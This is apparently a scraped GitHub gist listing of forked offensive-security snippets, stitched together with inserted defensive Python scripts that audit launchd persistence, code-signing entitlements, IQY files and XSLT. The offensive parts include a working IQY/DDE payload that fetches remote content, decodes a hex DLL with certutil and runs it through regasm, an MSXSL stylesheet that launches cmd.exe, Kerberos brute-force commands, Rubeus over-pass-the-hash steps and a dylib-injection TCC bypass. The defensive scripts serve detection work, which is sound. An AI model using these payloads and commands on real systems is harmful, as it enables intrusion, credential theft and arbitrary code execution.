Apple persistence mechanisms

| Type | Location | Documentation |
| --- | --- | --- |
| Kernel/System Extensions | /System/Library/Extensions/, /Library/Extensions/, /Extra/Extensions/ | https://developer.apple.com/fr/support/kernel-extensions/ (/Extra/Extensions/ is deprecated) |
| Launch Daemons | /System/Library/LaunchDaemons/, /Library/LaunchDaemons/ | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/Introduction.html (daemons are system-wide only; launchd has no per-user LaunchDaemons directory, per-user jobs are Launch Agents) |
| Launch Agents | /System/Library/LaunchAgents/, /Library/LaunchAgents/, /Users/*/Library/LaunchAgents/ | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/Introduction.html |
| Startup Items | /System/Library/StartupItems/, /Library/ | |
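The table above lists where launchd looks for persistence; the script below is an added example (not part of the original gist) that audits those directories. It parses each job plist with `plistlib`, reports what the job executes and which keys make it start on its own, and flags enabled self-starting jobs whose program lives outside a set of expected prefixes. The `root` argument lets you point it at a mounted disk image instead of the live system. The plists written by `build_sample_tree()` are constructed for the demo, and `TRUSTED_PREFIXES` is this example's heuristic, not an Apple-defined list.

```python
"""Audit the launchd persistence paths from the table above (added example)."""
import glob
import os
import plistlib
import tempfile

# Directories launchd scans for job plists (the per-user one is expanded with glob).
LAUNCHD_DIRS = [
    "/System/Library/LaunchDaemons",
    "/Library/LaunchDaemons",
    "/System/Library/LaunchAgents",
    "/Library/LaunchAgents",
    "/Users/*/Library/LaunchAgents",
]
# Keys that make launchd start a job without anyone asking for it.
AUTOSTART_KEYS = ("RunAtLoad", "KeepAlive", "StartInterval",
                  "StartCalendarInterval", "WatchPaths", "QueueDirectories")
# Heuristic (this example's choice): programs under these prefixes are expected.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/",
                    "/Library/Apple/", "/Applications/")


def describe_job(path):
    """Summarise one launchd plist; returns None if it is not a valid plist."""
    try:
        with open(path, "rb") as fh:
            job = plistlib.load(fh)
    except Exception:          # plistlib raises several types for bad input
        return None
    argv = list(job.get("ProgramArguments") or [])
    program = job.get("Program") or (argv[0] if argv else None)
    return {
        "path": path,
        "label": job.get("Label"),
        "program": program,
        "argv": argv,
        "autostart": [k for k in AUTOSTART_KEYS if job.get(k)],
        "disabled": bool(job.get("Disabled", False)),
    }


def audit(root="/", dirs=LAUNCHD_DIRS):
    """Parse every .plist under the launchd directories below root."""
    findings = []
    for d in dirs:
        pattern = os.path.join(root, d.lstrip("/"), "*.plist")
        for plist in sorted(glob.glob(pattern)):
            info = describe_job(plist)
            if info:
                findings.append(info)
    return findings


def suspicious(findings):
    """Enabled, self-starting jobs whose program is outside the trusted prefixes."""
    return [f for f in findings
            if f["program"] and f["autostart"] and not f["disabled"]
            and not f["program"].startswith(TRUSTED_PREFIXES)]


def build_sample_tree():
    """Write two constructed plists into a temp dir laid out like a macOS volume."""
    root = tempfile.mkdtemp()
    jobs = {
        "Library/LaunchDaemons/com.example.helper.plist": {
            "Label": "com.example.helper",
            "ProgramArguments": ["/usr/libexec/example-helper", "--check"],
            "StartInterval": 3600,
        },
        "Users/alice/Library/LaunchAgents/com.evil.dropper.plist": {
            "Label": "com.evil.dropper",
            "ProgramArguments": ["/Users/alice/.cache/.x", "-q"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
    }
    for rel, body in jobs.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            plistlib.dump(body, fh)
    return root


if __name__ == "__main__":
    for f in suspicious(audit()):      # audit the live system
        print(f["label"], f["program"], f["autostart"], f["path"])
```

Run it with no arguments on a Mac to list self-starting jobs outside the trusted prefixes; pass `audit("/Volumes/image")` to triage a mounted image. The trusted-prefix list is deliberately short: anything launched from a user's home directory or from /tmp should always be looked at.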
its-a-feature / extract.cpp
Created May 25, 2021 22:41 — forked from monoxgas/extract.cpp
macOS Shared DYLD Cache Extraction (Big Sur)
// ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html
// > SDKROOT=`xcrun --sdk macosx --show-sdk-path`
// > clang++ -o extract extract.cpp
// > mkdir libraries
// > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/
#include <stdio.h>
#include <stddef.h>
#include <dlfcn.h>
its-a-feature / _obs_tcc.md
Created January 1, 2021 18:11 — forked from theevilbit/_obs_tcc.md
StreamLabs OBS macOS TCC bypass

The Streamlabs macOS desktop client has the hardened runtime enabled, but its entitlements specifically allow DYLD environment variables (com.apple.security.cs.allow-dyld-environment-variables) and disable library validation (com.apple.security.cs.disable-library-validation), which defeats the purpose of the hardened runtime. With both entitlements present, an attacker can inject a custom dylib into the application (for example through DYLD_INSERT_LIBRARIES), read data inside the app and possibly use it for persistence. Beyond that, because Streamlabs has been granted microphone and camera access by TCC, the injected code inherits that access, which is the TCC bypass.

The offending entitlements can be seen by running the codesign utility:

csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
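To turn the check above into something repeatable, here is an added example (not part of the original write-up) that parses the combined output of `codesign -dv --entitlements :- <app>` and decides whether dylib injection is possible. It reads the hardened-runtime flag from the `flags=...(runtime)` line and the entitlement plist that follows the header (the XML form Big Sur prints; on newer macOS add `--xml`). `SAMPLE_OUTPUT` is a constructed stand-in modelled on that output, not the real Streamlabs entitlement list, and the `WEAKENING` table is this example's selection.

```python
"""Assess code-signing flags and entitlements for dylib injectability (added example)."""
import plistlib
import re
import subprocess

# Entitlements that weaken the hardened runtime, with what each one permits.
WEAKENING = {
    "com.apple.security.cs.allow-dyld-environment-variables": "DYLD_* variables are honoured",
    "com.apple.security.cs.disable-library-validation": "dylibs from any signer can be loaded",
    "com.apple.security.cs.allow-unsigned-executable-memory": "unsigned executable memory",
    "com.apple.security.get-task-allow": "task port obtainable by a debugger",
}
ALLOW_DYLD = "com.apple.security.cs.allow-dyld-environment-variables"
DISABLE_LV = "com.apple.security.cs.disable-library-validation"


def run_codesign(app_path):
    """Collect codesign's stderr (signing info) and stdout (entitlements) together."""
    p = subprocess.run(["codesign", "-dv", "--entitlements", ":-", app_path],
                       capture_output=True)
    return p.stderr + p.stdout


def parse_entitlements(raw):
    """Pull the XML entitlement plist out of the mixed codesign output."""
    start = raw.find(b"<?xml")
    if start < 0:
        start = raw.find(b"<plist")
    end = raw.find(b"</plist>")
    if start < 0 or end < 0:
        return {}
    return plistlib.loads(raw[start:end + len(b"</plist>")])


def assess(raw):
    """Decide whether DYLD_INSERT_LIBRARIES-style injection is possible."""
    text = raw.decode("utf-8", "replace")
    m = re.search(r"flags=0x[0-9a-fA-F]+\(([^)]*)\)", text)
    flags = m.group(1).split(",") if m else []
    ident = re.search(r"^Identifier=(.*)$", text, re.M)
    ents = parse_entitlements(raw)
    hardened = "runtime" in flags
    weak = [k for k in WEAKENING if ents.get(k) is True]
    # Hardened runtime (or the restrict flag) blocks DYLD_* unless the app opts back in.
    dyld_env_honoured = (hardened and ALLOW_DYLD in weak) or \
                        (not hardened and "restrict" not in flags)
    # Hardened runtime implies library validation unless explicitly disabled.
    any_dylib_loads = (DISABLE_LV in weak) or \
                      (not hardened and "library-validation" not in flags)
    return {
        "identifier": ident.group(1).strip() if ident else None,
        "hardened_runtime": hardened,
        "flags": flags,
        "weakening_entitlements": weak,
        "dyld_injectable": dyld_env_honoured and any_dylib_loads,
    }


# Constructed sample: header lines as codesign prints them, then the entitlement plist.
SAMPLE_OUTPUT = b"""Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+5 location=embedded
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.security.cs.allow-dyld-environment-variables</key>
    <true/>
    <key>com.apple.security.cs.disable-library-validation</key>
    <true/>
    <key>com.apple.security.device.camera</key>
    <true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    import sys
    data = run_codesign(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_OUTPUT
    print(assess(data))
```

`assess()` reports `dyld_injectable` only when the DYLD variables are honoured and library validation will not reject the injected dylib; an app with hardened runtime and only `allow-dyld-environment-variables` is not flagged, because library validation still limits it to dylibs signed by the same Team ID or Apple.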
its-a-feature / syscalls.txt
Created December 10, 2020 22:31 — forked from nikolay-n/syscalls.txt
macOS BSD syscall numbers (on x86_64 the syscall instruction expects these OR'd with the Unix class prefix 0x2000000)
syscall = 0
exit = 1
fork = 2
read = 3
write = 4
open = 5
close = 6
wait4 = 7
link = 9
unlink = 10
its-a-feature / kerberos_attacks_cheatsheet.md
Created September 27, 2020 21:36 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that has the brute module:

its-a-feature / poc.iqy
Created January 31, 2019 23:56 — forked from Mr-Un1k0d3r/poc.iqy
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
its-a-feature / remote.iqy
Created January 31, 2019 23:56 — forked from Mr-Un1k0d3r/remote.iqy
IQY File Remote Payload POC
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
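The two IQY gists above work as a pair: Excel fetches the URL named in poc.iqy, the served content is a DDE formula, and that formula carves a hex-encoded DLL out of the locally saved poc.iqy (skipping the 12-line header with `more /E +12`), decodes it with certutil and runs it via regasm /U. The following is an added example (not from either gist) that parses IQY files, spots DDE formulas in fetched content, and carves the embedded payload the same way. Both samples are constructed to mirror the layout; `PLACEHOLDER_DLL` stands in for the real DLL bytes, and the constructed header is 10 lines long (the gist's command skips 12), so the carve uses the parsed header length rather than a fixed count.

```python
"""Triage Excel IQY (Internet Query) files and the content they fetch (added example)."""
import re

# =server|'command'!item  -- the DDE formula shape used by the remote payload
DDE_RE = re.compile(r"^\s*=\s*([A-Za-z][\w.]*)\s*\|(.*?)!")
HEX_LINE_RE = re.compile(r"^[0-9A-Fa-f\s]+$")

PLACEHOLDER_DLL = b"MZ\x90\x00" + bytes(12)        # constructed stand-in for a DLL
HEADER_LINES = [                                    # constructed 10-line IQY header
    "WEB", "1", "https://ringzer0team.com/IQY",
    "Selection=EntirePage", "Formatting=RTF", "PreFormattedTextToColumns=True",
    "ConsecutiveDelimitersAsOne=True", "SingleBlockTextImport=False",
    "DisableDateRecognition=False", "DisableRedirections=False",
]
POC_IQY = "\n".join(HEADER_LINES + [PLACEHOLDER_DLL.hex()]) + "\n"
REMOTE_PAYLOAD = (r"=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex"
                  r" && certutil -decodehex %temp%\poc.hex %temp%\poc.dll"
                  r" && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'")


def parse_iqy(text):
    """Split an IQY file into version, URL, options and the header length."""
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not a WEB query file")
    options, header_len = {}, len(lines)
    for i in range(3, len(lines)):
        line = lines[i]
        if "=" in line and not line.lstrip().startswith("="):
            key, value = line.split("=", 1)
            options[key.strip()] = value.strip()
        else:                      # first line that is not an option ends the header
            header_len = i
            break
    return {"version": lines[1].strip(), "url": lines[2].strip(),
            "options": options, "header_lines": header_len}


def find_dde(text):
    """Return DDE formulas (=server|'command'!item) found in the text."""
    hits = []
    for line in text.splitlines():
        m = DDE_RE.match(line)
        if m:
            hits.append({"server": m.group(1).lower(),
                         "command": m.group(2).strip().strip("'").strip()})
    return hits


def carve_payload(text, skip):
    """Mimic `more /E +skip file` followed by `certutil -decodehex`."""
    tail = text.splitlines()[skip:]
    hexdata = "".join(l for l in tail if HEX_LINE_RE.match(l))
    return bytes.fromhex("".join(hexdata.split()))


def triage(text):
    """Combine the checks into one verdict for an IQY file or fetched content."""
    result = {"is_iqy": False, "url": None, "dde": find_dde(text),
              "payload": b"", "flags": []}
    try:
        info = parse_iqy(text)
    except ValueError:
        info = None
    if info:
        result["is_iqy"], result["url"] = True, info["url"]
        result["payload"] = carve_payload(text, info["header_lines"])
        if info["url"].lower().startswith("http://"):
            result["flags"].append("plain-http")
    if result["payload"][:2] == b"MZ":
        result["flags"].append("embedded-payload")
    if result["dde"]:
        result["flags"].append("dde-formula")
    return result


if __name__ == "__main__":
    print(triage(POC_IQY))
    print(triage(REMOTE_PAYLOAD))
```

A mail gateway or sandbox can run `triage()` on both the attachment and on whatever its URL serves: a legitimate IQY file has nothing after its option lines, and legitimate query results contain no `=server|...!item` formulas.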
its-a-feature / gist:399ad86b2c8e5032207a65af8b6858ff
Created October 25, 2018 22:03 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# inject the .kirbi
its-a-feature / minimalist.xml
Created March 17, 2018 22:03
MSXSL Single File Payload
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
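The payload above relies on MSXML honouring `<ms:script>` elements in the `urn:schemas-microsoft-com:xslt` namespace, so the stylesheet runs JScript when msxsl.exe (or `wmic ... /FORMAT:`) loads it. The following is an added example (not part of the original gist) that parses a stylesheet with ElementTree, lists every such script block with its language and any COM/shell indicators in its body, and gives a verdict. `SAMPLE_XSL` is the gist's stylesheet with its closing tag; `BENIGN_XSL` and the `INDICATORS` list are constructed for this example.

```python
"""Find script blocks in XSLT that MSXML would execute (added example)."""
import xml.etree.ElementTree as ET

MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"
XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Strings that usually mean the script does more than a pure transform (this example's list).
INDICATORS = ("ActiveXObject", "WScript.Shell", "Shell.Application", "CreateObject",
              "Scripting.FileSystemObject", "XMLHTTP", "ADODB.Stream")


def scan_xslt(xml_text):
    """Return the stylesheet's script blocks and whether any looks like a payload."""
    root = ET.fromstring(xml_text)
    scripts = []
    for el in root.iter(f"{{{MS_XSLT_NS}}}script"):
        body = "".join(el.itertext()).strip()        # CDATA arrives as ordinary text
        scripts.append({
            "language": el.get("language", "JScript"),   # MSXML's default language
            "prefix": el.get("implements-prefix"),
            "indicators": [i for i in INDICATORS if i in body],
            "body": body,
        })
    return {
        "is_stylesheet": root.tag in (f"{{{XSL_NS}}}stylesheet", f"{{{XSL_NS}}}transform"),
        "scripts": scripts,
        "malicious": any(s["indicators"] for s in scripts),
    }


# The gist's payload, completed with its closing tag.
SAMPLE_XSL = """<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
"""

# Constructed: an ordinary text-output transform with no script block.
BENIGN_XSL = """<?xml version='1.0'?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="text"/>
<xsl:template match="/"><xsl:value-of select="."/></xsl:template>
</xsl:stylesheet>
"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_XSL), ("benign", BENIGN_XSL)):
        v = scan_xslt(doc)
        print(name, "malicious" if v["malicious"] else "clean", len(v["scripts"]), "script block(s)")
```

Note that the gist's script never has to be called from a template: the JScript runs when the block is compiled, which is why the stylesheet needs no `<template>` at all, and why a detection should not require one either.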
its-a-feature / Domain Enumeration Commands
Created January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users